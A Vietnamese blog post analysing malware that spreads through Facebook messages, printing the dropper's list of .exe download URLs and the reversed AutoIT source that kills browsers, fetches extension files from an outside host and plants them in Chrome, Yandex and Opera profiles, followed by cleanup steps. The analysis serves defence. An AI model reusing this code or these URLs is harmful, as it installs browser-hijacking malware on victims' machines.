Analysis con malware lây nhiễm trên facebook


- Hiện tượng:
1. Nhắn tin nhắn tới danh sách bạn bè trên Facebook, với nội dung một đường link.
2. Khi nhấn vào đường link này sẽ download tệp tin .EXE về máy tính.

3. Khi chạy tệp tin xong, máy tính sẽ bị nhiễm và tiếp tục gửi tin.

Đường link có dạng sau:
https://9b102c9132fc2995f11f-90f5b1ca4ed410dd209886f93c61da67.ssl.cf5.rackcdn.com/LK8Y5CjfjK0LOBZufflKwJRclfKMcl5ip4WamgLE.html#ref=93740

Tin nhắn đến sẽ có hình avatar của người được nhận.

var exeler = [
"https://s3-us-west-2.amazonaws.com/yeslanw232323sdsdsd2sds13/video_watching_mp4_facebook_12222333232122233sd29000421003.exe",
"https://s3-us-west-2.amazonaws.com/sadask2323s/video_watching_mp4_facebook_1222233323212233sd29000421003.exe",
"https://s3-us-west-2.amazonaws.com/sadsak2k323s/video_watching_mp4_facebook_122223332322233sd2900042003.exe",
"https://s3-us-west-2.amazonaws.com/sadsadk21k323s/video_watching_mp4_facebook_1222323222332900042003.exe",
"https://s3-us-west-2.amazonaws.com/bakbakbak323/video_watching_mp4_facebook_122223332322233sd29000421003.exe",
"https://s3-us-west-2.amazonaws.com/sadsad21323ss/video_watching_mp4_facebook_133290004003.exe",
"https://s3-us-west-2.amazonaws.com/sdskdk213s/video_watching_mp4_facebook_12233290004003.exe",
"https://s3-us-west-2.amazonaws.com/bakbakwsd21323/video_watching_mp4_facebook_122332900042003.exe",
"https://s3-us-west-2.amazonaws.com/23sds123s/video_watching_mp4_facebook_12222332900042003.exe"];
var exem = exeler[Math.floor(Math.random() * (exeler.length))];

Như vậy, là nó tự động download một trong các tệp tin trên về máy tính, người nào thực thi sẽ tự cài đặt nó lên máy tính. Hiện tại, tôi đã gặp ít nhất là 2 mẫu loại này lây nhiễm trên máy tính. malware này được viết bằng autoIT. reverse ta được.

Local $chrxxxx1 = "C"
Local $chrxxxx2 = "h"
Local $chrxxxx3 = "r"
Local $chrxxxx4 = "o"
Local $chrxxxx5 = "m"
Local $chrxxxx6 = "e"
Local $chrxxxx = $chrxxxx1 & $chrxxxx2 & $chrxxxx3 & $chrxxxx4 & $chrxxxx5 & $chrxxxx6
Local $browxs1 = "b"
Local $browxs2 = "r"
Local $browxs3 = "o"
Local $browxs4 = "w"
Local $browxs5 = "s"
Local $browxs6 = "e"
Local $browxs7 = "r"
Local $browxs = $browxs1 & $browxs2 & $browxs3 & $browxs4 & $browxs5 & $browxs6 & $browxs7
Local $extsd1 = "E"
Local $extsd2 = "x"
Local $extsd3 = "t"
Local $extsd4 = "e"
Local $extsd5 = "n"
Local $extsd6 = "s"
Local $extsd7 = "i"
Local $extsd8 = "o"
Local $extsd9 = "n"
Local $extsd0 = "s"
Local $extsd = $extsd1 & $extsd2 & $extsd3 & $extsd4 & $extsd5 & $extsd6 & $extsd7 & $extsd8 & $extsd9 & $extsd0
If ProcessExists("" & $chrxxxx & ".exe") Then
ProcessClose("" & $chrxxxx & ".exe")
EndIf
If ProcessExists("" & $browxs & ".exe") Then
ProcessClose("" & $browxs & ".exe")
EndIf
If ProcessExists("opera.exe") Then
ProcessClose("opera.exe")
EndIf
Sleep(100)
Local $okanid = BinaryToString(InetRead("http://www.patronbayi.com/class.php?idver=true"))
DirCreate(@UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate(@UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate(@UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)
DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate("C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid)
DirCreate("C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid)
DirCreate(@UserProfileDir & "\file_shared_xs\")
Sleep(100)
InetGet("http://www.patronbayi.com/Preferences", @UserProfileDir & "\file_shared_xs\Preferences", 9)
Sleep(50)
If NOT FileSetAttrib(@UserProfileDir & "\file_shared_xs\Preferences", "+R") Then
EndIf
InetGet("http://www.patronbayi.com/ext/background.js", @UserProfileDir & "\file_shared_xs\background.js", 9)
InetGet("http://www.patronbayi.com/manifest.json", @UserProfileDir & "\file_shared_xs\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Local\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", @UserProfileDir & "\AppData\Roaming\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Google\" & $chrxxxx & "\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\" & $extsd & "\" & $okanid & "\manifest.json", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\Preferences", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\Preferences", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\background.js", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\background.js", 9)
FileCopy(@UserProfileDir & "\file_shared_xs\manifest.json", "C:\Documents and Settings\" & @UserName & "\Application Data\Opera Software\Opera Stable\" & $extsd & "\" & $okanid & "\manifest.json", 9)
Sleep(100)
ShellExecute("" & $chrxxxx & ".exe")

Như vậy, nó gửi http tới

www.patronbayi.com GET /class.php?idver=true HTTP/1.1
www.patronbayi.com GET /Preferences HTTP/1.1
www.patronbayi.com GET /ext/background.js HTTP/1.1
www.patronbayi.com GET /manifest.json HTTP/1.1

có nhiều nơi lưu tệp tin thực thi khác nhau, nhưng tôi tìm thấy 2 vị trí được lưu là:

C:\TEST\sample.exe và
%appdata%sysreg.exe
C:\User\[username]\Program Data\sysreg.exe
C:\f_install.exe

Các bạn seach các tệp .EXE trên và xóa đi, sau đó tìm kiếm các thư mục sau:

C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default\Extensions
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data\Default
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser\User Data
C:\Documents and Settings\User\Local Settings\Application Data\Yandex\YandexBrowser
C:\Documents and Settings\User\Local Settings\Application Data\Yandex
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data\Default
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\User Data
C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome
C:\Documents and Settings\User\Local Settings\Application Data\Google
C:\Documents and Settings\User\file_shared_xs
C:\Documents and Settings\User\Application Data\Opera Software\Opera Stable\Extensions
C:\Documents and Settings\User\Application Data\Opera Software\Opera Stable
C:\Documents and Settings\User\Application Data\Opera Software
C:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera Stable\Extensions
C:\Documents and Settings\User\AppData\Roaming\Opera Software\Opera Stable
C:\Documents and Settings\User\AppData\Roaming\Opera Software
C:\Documents and Settings\User\AppData\Roaming
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\Default\Extensions
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data\Default
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser\User Data
C:\Documents and Settings\User\AppData\Local\Yandex\YandexBrowser
C:\Documents and Settings\User\AppData\Local\Yandex
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\Default\Extensions
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data\Default
C:\Documents and Settings\User\AppData\Local\Google\Chrome\User Data
C:\Documents and Settings\User\AppData\Local\Google\Chrome
C:\Documents and Settings\User\AppData\Local\Google
C:\Documents and Settings\User\AppData\Local
C:\Documents and Settings\User\AppData

Xóa cả thư mục hoặc 3 tệp tin sau: Preferences, background.js, manifest.json

Hiện tại, mẫu malware này vẫn tiếp tục cập nhật phiên bản mới. Các bạn thường xuyên theo dõi topic để xóa virus. Nếu cần thiết, tôi sẽ viết chương trình để xóa toàn bộ virus khỏi máy nếu có nhiều người mắc phải loại này.

Nguồn : Hoàng Cường

Related Posts